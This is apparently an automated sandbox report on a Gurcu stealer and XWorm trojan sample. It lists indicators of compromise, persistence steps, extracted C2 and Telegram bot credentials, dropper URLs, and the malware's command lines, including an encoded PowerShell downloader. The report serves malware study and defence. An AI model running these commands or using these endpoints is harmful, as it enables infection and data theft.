gurcu | 0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2024 08:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe
Size

2.1MB
MD5

de2b7ec32d3a5c530e5a1aa6f2b27b16
SHA1

83c3c02a1c5746882094939ed4f1ab61954ff8f0
SHA256

0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f
SHA512

e76d643dc5fad7de78172bafe3b33da231bbce76fb2c46235338e811112f32775dfd20acf770141808ee00c0e9527829933d9ec1ee04c776b774eff80168bee8
SSDEEP

24576:S/BARUsXRaTX3P/drZ6p7Ut2Qcbgn5DFIOG+N3mYm8hz8UQn652/BJOD:i2HXRWXdrEDQ0gn5xfG+8H8hz8rdm

Score

10^/10

gurcu xworm discovery execution persistence rat stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

Extracted

Family

xworm

Version

5.0

65.52.240.233:5555

Mutex

hVgkZkPRZQoZH7T4

Attributes

Install_directory
%AppData%
install_file
sys32.exe
telegram
https://api.telegram.org/bot7375017271:AAF3S5-3qI4b0tLhUfBGhd5L6j0wySL4pLI

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7375017271:AAF3S5-3qI4b0tLhUfBGhd5L6j0wySL4pLI/sendMessage?chat_id=-4568444843

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4612-197-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 8 IoCs

flow	pid	Process
20	1456	wscript.exe
21	1152	wscript.exe
22	1456	wscript.exe
23	1152	wscript.exe
35	4944	powershell.exe
36	2832	powershell.exe
38	4944	powershell.exe
39	2832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1208	powershell.exe
940	powershell.exe
2740	powershell.exe
4076	powershell.exe
4944	powershell.exe
2832	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_file32_x.js.bat	0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_file64_p.js.bat	0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AddInProcess32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AddInProcess32.exe

Executes dropped EXE 2 IoCs

pid	Process
3024	sys32.exe
3496	sys32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sys32 = "C:\\Users\\Admin\\AppData\\Roaming\\sys32.exe"	AddInProcess32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
36	raw.githubusercontent.com
34	raw.githubusercontent.com
35	raw.githubusercontent.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2832 set thread context of 4612	2832	powershell.exe	117
PID 4944 set thread context of 4716	4944	powershell.exe	118

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3144	PING.EXE
3584	cmd.exe
2140	cmd.exe
2300	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2300	PING.EXE
3144	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4296	schtasks.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
1208	powershell.exe
1208	powershell.exe
940	powershell.exe
940	powershell.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
940	powershell.exe
1208	powershell.exe
2740	powershell.exe
2740	powershell.exe
4076	powershell.exe
4076	powershell.exe
4076	powershell.exe
2740	powershell.exe
2832	powershell.exe
2832	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	4612	AddInProcess32.exe
Token: SeDebugPrivilege	4716	AppLaunch.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2608	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe
2608	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3468 wrote to memory of 2808	3468	0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe	85
PID 3468 wrote to memory of 2808	3468	0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe	85
PID 2808 wrote to memory of 2608	2808	cmd.exe	87
PID 2808 wrote to memory of 2608	2808	cmd.exe	87
PID 2808 wrote to memory of 2608	2808	cmd.exe	87
PID 2608 wrote to memory of 3580	2608	AcroRd32.exe	89
PID 2608 wrote to memory of 3580	2608	AcroRd32.exe	89
PID 2608 wrote to memory of 3580	2608	AcroRd32.exe	89
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2740	3580	RdrCEF.exe	90
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91
PID 3580 wrote to memory of 2708	3580	RdrCEF.exe	91

C:\Users\Admin\AppData\Local\Temp\0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe
"C:\Users\Admin\AppData\Local\Temp\0cf06c833517acebaebf18e5b36edccb4903a112117dbee1a19f9b76c7a7b36f.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3468
- C:\Windows\system32\cmd.exe
  "cmd" /C start C:\Users\Public\Documents\infringing_content.pdf
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\Documents\infringing_content.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0968AE77FAB5896E4188B52E7645BCDF --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2740
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B25CA2BC2A00BCA79DC20BF0C0B8186B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B25CA2BC2A00BCA79DC20BF0C0B8186B --renderer-client-id=2 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2708
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0503F32BA52EE9DC76A6C8F2DF63873E --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1484
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=45D916125DA8DF6FA2C5EA5E26271CF3 --mojo-platform-channel-handle=1928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:736
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=83AD5AB66BA6EDA61BEBD28D54840126 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2104
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=51A6F04664053B254999262B9C1768F7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=51A6F04664053B254999262B9C1768F7 --renderer-client-id=7 --mojo-platform-channel-handle=1840 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3196
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:1708
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\file32_x.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  PID:1152
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\file32_x.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3584
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\file32_x.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAZwBVAHcAaQBtAGEAZwBlAFUAcgBsACAAPQAgADUAdQBOACcAKwAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAnACsAJwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQwByAHkAcAB0AGUAJwArACcAcgBzAEEAbgBkAFQAbwBvAGwAcwBPAGYAaQBjAGkAYQBsAC8AWgBJAFAALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAcABnACAANQB1AE4AOwBnAFUAdwB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5ACcAKwAnAHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAZwBVAHcAaQBtAGEAZwBlAEIAeQB0AGUAcwAgACcAKwAnAD0AIABnAFUAdwB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAZwBVAHcAaQBtAGEAZwBlAFUAcgBsACkAOwBnAFUAdwBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAJwArACcAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABnAFUAdwBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBnAFUAdwBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAA1AHUATgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ADUAdQBOADsAZwBVAHcAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIAA1AHUATgA8ADwAQgBBACcAKwAnAFMARQA2ADQAXwBFAE4ARAA+AD4ANQB1AE4AOwBnA